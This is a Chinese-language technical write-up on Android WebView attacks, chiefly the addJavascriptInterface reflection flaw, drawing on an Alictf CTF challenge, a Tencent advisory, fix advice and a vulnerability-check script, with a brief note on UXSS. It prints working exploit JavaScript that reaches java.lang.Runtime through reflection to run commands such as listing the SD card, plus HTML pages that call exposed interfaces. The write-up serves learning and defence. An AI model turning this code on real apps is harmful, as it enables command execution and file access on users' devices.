对Webview跨源攻击的理解

首先是addJavaScriptInterface漏洞:

  有时候访问手机百度贴吧网页版本,网页上会有个按钮提示用手机应用打开。这种交互通常都是使用JS来实现,而WebView已经提供了这样的方法,具体用法如下:

mWebView.getSettings().setJavaScriptEnabled(true);  
mWebView.addJavascriptInterface(new JSInterface(), "jsInterface");

  向WebView注册一个名叫“jsInterface”的对象,然后在JS中可以访问到jsInterface这个对象,就可以调用这个对象的一些方法,最终可以调用到Java代码中,从而实现了JS与Java代码的交互

  This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLY_BEAN or below, because JavaScript could use reflection to access an injected object's public fields.

  在Jelly Bean之后,addJavaScriptInterface这个方法已经被取消了,但如果想要兼容这之前的设备,还必须使用。

  通过这个漏洞,JavaScript可以访问SD卡上的文件。

  JS中可以遍历window对象,找到存在“getClass”方法的对象的对象,然后再通过反射的机制,得到Runtime对象,然后调用静态方法来执行一些命令,比如访问文件的命令。

function execute(cmdArgs)
{
    for (var obj in window) {
        if ("getClass" in window[obj]) {
            alert(obj);
            return  window[obj].getClass().forName("java.lang.Runtime")
                 .getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
        }
    }
} 

这样就可以执行一些command比如:

var p = execute(["ls","/mnt/sdcard/"]);  

Alictf第三题便是要输入一个网址,点击那个网址可以调用那个addJavaScriptInterface的第二个对象(上面对应的jsInterface),如果你知道了那个对象的名字和方法,就可以这样构造一个html:

<html>
<body>

<script type="text/javascript">
function crack()
{
  SmokeyBear.showToast()
}
  crack()
</script>

</body>  
</html> 

把这个html命名为aa.html,放到sdcard上,输入file:///sdcard/aa.html,就会触发应用程序的showToast()方法;也可以放到服务器*问。

或者不知道SmokeyBear这个对象,可以这样:

<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<script>
function findobj(){
for (var obj in window) { 
if ("getClass" in window[obj]) { 
return window[obj] 
} 
} 
}
</script> 
</head>
<body>
hellowrold!
<script type="text/javascript">
var obj = findobj()
obj.showToast()
</script>
</body> 
</html>

setJavaScriptEnabled

通过此API可以设置是否允许WebView使用JavaScript,默认是不允许,但很多应用,包括移动浏览器为了让WebView执行http协议中的javascript,都会主动设置允许WebView执行Javascript,而又不会对不同的协议区别对待,比较安全的实现是如果加载的url是http或https协议,则启用javascript,如果是其它危险协议,如是file协议,则禁用javascript。禁用file协议的javascript可以很大程度上减小跨源漏洞对WebView的威胁。

安全建议:

1.对于不需要使用file协议的应用,禁用file协议

2.对于需要使用file协议的应用,禁止file协议调用javascript

腾讯实验室(http://security.tencent.com/index.php/opensource/detail/1)的解释:

漏洞原理:
在安卓WebView 组件中存在 addJavascriptInterface 方法,主要用于将Java类或方法导出以供JavaScript调用。但是,JavaScript在调用导出的Java类时,可通过反射执行任意JAVA代码。典型的攻击场景:通过受影响的app发送恶意构造页面的URL,用户点击打开URL后,会执行恶意代码。比如某安卓应用使用addJavascriptInterface 方法提供以下接口:

this.b.addJavascriptInterface(new fz(this, null), "js_class_name");

那么可构造恶意html页面,然后通过JavaScript调用该接口来执行系统命令:

js_class_name.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

修复方案:

1、如果无需与JS交互,请删除对addJavascriptInterface函数的调用;

2、在载入页面时对URL进行白名单判定,只有存在白名单中的域才允许导出或调用相关的Java类或方法;

 

它们给出的验证方案是用应用访问(http://security.tencent.com/lucky/check_tools.html)这个页面,它会给你提示是否有漏洞。

那个页面的中的算法是这样的:

<script type="text/javascript">

function check()
{

    var res = 0;

    for (var obj in window) 
    {
        try {
            if ("getClass" in window[obj]) {
                try{
                    window[obj].getClass();
                    document.getElementById("res_show").innerHTML = "<b><font color='red'>当心!您当前使用的APP可能存在Andriod WebView 挂马漏洞!请不要用这个APP打开不可信的外部链接!</font></b>";
                    res = 1;
                    break;
                }catch(e){
                }    
            }
        } catch(e) {
        }
    }

    if(res==0)
    {
        document.getElementById("res_show").innerHTML = "<b><font color='green' size=6>恭喜!您当前的APP不存在Andriod WebView 挂马漏洞!请放心使用!</font></b>";
    }
}
</script>

也就是遍历window,查找「getClass」,看有没有反射调用的地方,有就提示。

wooyun给出的方法也类似。下图是用alictf的jscrack访问http://drops.wooyun.org/webview.html得到的结果:

对Webview跨源攻击的理解 

那是因为jscrack中为SmokeyBear这个街口定义了类似这样的shwoToast()方法:

对Webview跨源攻击的理解

-------------------------------------------------------------

除了addJavascriptInterface执行漏洞,还有UXXS漏洞

通用型跨站脚本(UXSS,Universal Cross-Site Scfipting),主要是利用浏览器及插件的漏洞(比如同源策略绕过,导致A站的脚本可以访问B站的各种私有属性,例如cookie等)来构造跨站条件,以执行恶意代码。

参考:

http://blog.csdn.net/leehong2005/article/details/11808557

http://blogs.360.cn/360mobile/2014/09/22/webview%e8%b7%a8%e6%ba%90%e6%94%bb%e5%87%bb%e5%88%86%e6%9e%90/

http://bbs.pediy.com/showthread.php?t=192928&highlight=webview